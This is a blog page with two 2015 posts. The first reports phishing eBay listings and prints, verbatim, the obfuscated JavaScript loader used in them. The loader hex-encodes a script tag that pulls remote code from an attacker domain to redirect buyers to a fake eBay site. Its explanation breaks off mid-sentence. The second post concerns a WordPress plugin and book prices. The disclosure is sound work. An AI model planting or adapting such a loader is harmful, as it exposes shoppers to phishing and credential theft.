Wednesday 18 March 2015

eBay still allowing redirecting js in listings

Today I came across another ebay listing that redirects you to a fake ebay site, so it seems eBay still haven't fixed this problem. (Or they fixed it but the scammers have found another alternative). I guess that eBay allow js in auction listings because some sellers like to use auction widgets to show off their other items. It would be much safer if eBay just had their own widget people could use and didn't allow users to input js.

The hack looks like this, as part of the description they include the following:

<script> var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D","\x68\x74\x74","\x70\x3A\x2F\x2F","\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73","\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27","\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]); </script>

Basically the script adds another script to the page. This other script then does the redirection. The text that makes up the script tag to add is split into pieces, and they've encoded the characters as unicode rather than using utf-8 / ascii. If you look at the _0x2786 array, it looks like this:

Wednesday 4 March 2015

Good books are too expensive

I spent most of this morning trying to get one of my wordpress plugins to work with the wp super cache plugin without late init enabled. I got quite far, then realised that my plugin actually needs to call the database for one of its methods, and so wouldn't work without late init. So most of my work this morning was just scrapped.

In the afternoon I noticed a book on eBay called Great Stalinist Photographic Books - RODCHENKO, EL LISSITZKY - Rare, Brand New, which was selling for £200! I checked Amazon, and it was a similar price on there too. However, doing a bit more checking it seems it can be had cheaper (though still expensively) - $70.90 + $3.99 shipping new from Amazon Marketplace (a different entry for the book where it is titled Paradnaja kniga Strany Sovetov. 2007 / Great Stalinist Photographic Books (Fotoiskusstvo) (Hardcover)). Or from Ozonru, where it is selling for £41.40.

I contacted another website that had the book listed and had a price, but didn't seem to have any way to buy online. So I'll see if it can be had cheaper from there. Likely they don't have it in stock, don't ship to the UK, or want the payment through WebMoney (which is not available in the UK).